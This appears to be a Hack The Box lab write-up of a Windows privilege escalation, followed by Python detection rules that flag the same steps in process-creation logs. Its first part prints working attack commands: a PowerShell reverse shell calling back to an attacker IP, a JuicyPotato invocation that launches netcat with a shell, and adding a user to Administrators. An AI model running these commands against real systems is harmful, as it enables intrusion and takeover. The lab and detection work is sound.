P1

Exploit the ping app:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.15.37',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
nc -lnvp 4444

For convenience, I then downloaded and executed a meterpreter on the host.

Then:

.\JuicyPotato.exe -l 6666 -p C:\Windows\system32\cmd.exe -a "/c C:\Windows\Temp\test\nc.exe 10.10.15.37 8443 -e cmd" -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}

This is one of the CLSIDs that works on Windows 10 (many don't).

Then I can add the non-privileged htb-student user to the local Administrators group:

net localgroup Administrators htb-student /add

Then connect via RDP.

powershell -Command "Get-ChildItem -Path C:\Users\ -Recurse -File | Select-String -Pattern 'ldapadmin'"
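As an added example that is not part of the original writeup, the Python below runs a few detection rules over constructed process-creation records shaped like Sysmon Event ID 1 / Security 4688 command lines, modelled on the steps above: the PowerShell TCPClient reverse shell, the JuicyPotato CLSID invocation, netcat with -e, and the Administrators group change. The sample events, rule names and the two benign decoys (a plain group listing and the Get-ChildItem search) are assumptions made for this example; the point is which of these steps leave a recognisable trace in host logs.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 style), modelled on
# the commands in this writeup. They are samples written for this example, not logs from the lab.
SAMPLE_EVENTS = [
    {"pid": 4120, "cmdline": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient"
                             "('10.10.15.37',4444);$stream = $client.GetStream();"
                             "$sendback = (iex $data 2>&1 | Out-String)\""},
    {"pid": 4188, "cmdline": "JuicyPotato.exe -l 6666 -p C:\\Windows\\system32\\cmd.exe "
                             "-a \"/c nc.exe 10.10.15.37 8443 -e cmd\" -t * "
                             "-c {8BC3F05E-D86B-11D0-A075-00C04FB68820}"},
    {"pid": 4201, "cmdline": "nc.exe 10.10.15.37 8443 -e cmd"},
    {"pid": 4230, "cmdline": "net localgroup Administrators htb-student /add"},
    {"pid": 4301, "cmdline": "net localgroup Administrators"},  # benign: lists the group only
    {"pid": 4355, "cmdline": "powershell -Command \"Get-ChildItem -Path C:\\Users\\ -Recurse -File\""},
]

GUID = r"\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}"

# Each rule is (name, predicate over the lowercased command line); one line can hit several rules.
RULES = [
    # PowerShell that opens a raw TCP socket and evaluates what it reads: the reverse-shell one-liner.
    ("powershell_tcp_reverse_shell",
     lambda c: "system.net.sockets.tcpclient" in c and ("iex " in c or "invoke-expression" in c)),
    # A CLSID passed with -c together with the "-t *" flag, as in the JuicyPotato invocation above.
    ("juicypotato_clsid_abuse",
     lambda c: re.search(r"-c\s*" + GUID, c) is not None and re.search(r"-t\s+\*", c) is not None),
    # netcat asked to attach a shell to the connection with -e.
    ("netcat_exec_shell",
     lambda c: re.search(r"\bnc(?:64)?(?:\.exe)?\b.*\s-e\s+(?:cmd|powershell)", c) is not None),
    # Membership change on the local Administrators group; merely listing the group is not flagged.
    ("local_admin_group_add",
     lambda c: re.search(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", c) is not None),
]


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the command line matches."""
    lowered = cmdline.lower()
    return [name for name, pred in RULES if pred(lowered)]


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run every rule over every event and return one (pid, rule) pair per hit."""
    return [(ev["pid"], rule) for ev in events for rule in classify(ev["cmdline"])]


if __name__ == "__main__":
    for pid, rule in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The group-membership step would also surface as Security Event ID 4732 (member added to a security-enabled local group) independently of command-line logging.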